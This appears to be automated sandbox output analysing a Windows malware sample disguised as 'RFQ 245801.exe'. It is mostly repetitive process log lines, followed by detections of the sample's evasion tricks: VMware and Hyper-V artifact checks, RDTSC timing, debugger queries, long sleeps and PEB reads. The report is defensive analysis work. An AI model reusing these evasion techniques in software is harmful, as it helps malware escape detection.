Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\RFQ 245801.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\RFQ 245801.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\RFQ 245801.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 26A9904 second address: 26A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 26A9B7E second address: 26A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 1130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 2B00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 2900000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 7780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 8780000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 8930000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: 9930000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6540 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3199 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2152 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7787 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 872 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 3812 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Window / User API: threadDelayed 6160 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\RFQ 245801.exe API coverage: 1.7 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 2.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\RFQ 245801.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep count: 2152 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep time: -4304000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep count: 7787 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6476 Thread sleep time: -15574000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep count: 3812 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep time: -7624000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep count: 6160 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624 Thread sleep time: -12320000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.4151697507.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.1743773191.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\RFQ 245801.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0040ACF0 LdrLoadDll, 5_2_0040ACF0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h] 5_2_017F4164
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h] 5_2_017F4164
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B8158 mov eax, dword ptr fs:[00000030h] 5_2_017B8158
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726154 mov eax, dword ptr fs:[00000030h] 5_2_01726154
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726154 mov eax, dword ptr fs:[00000030h] 5_2_01726154
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0171C156 mov eax, dword ptr fs:[00000030h] 5_2_0171C156
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h] 5_2_017B4144
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h] 5_2_017B4144
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B4144 mov ecx, dword ptr fs:[00000030h] 5_2_017B4144
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h] 5_2_017B4144
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h] 5_2_017B4144
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01750124 mov eax, dword ptr fs:[00000030h] 5_2_01750124
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CA118 mov ecx, dword ptr fs:[00000030h] 5_2_017CA118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h] 5_2_017CA118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h] 5_2_017CA118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h] 5_2_017CA118
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E0115 mov eax, dword ptr fs:[00000030h] 5_2_017E0115
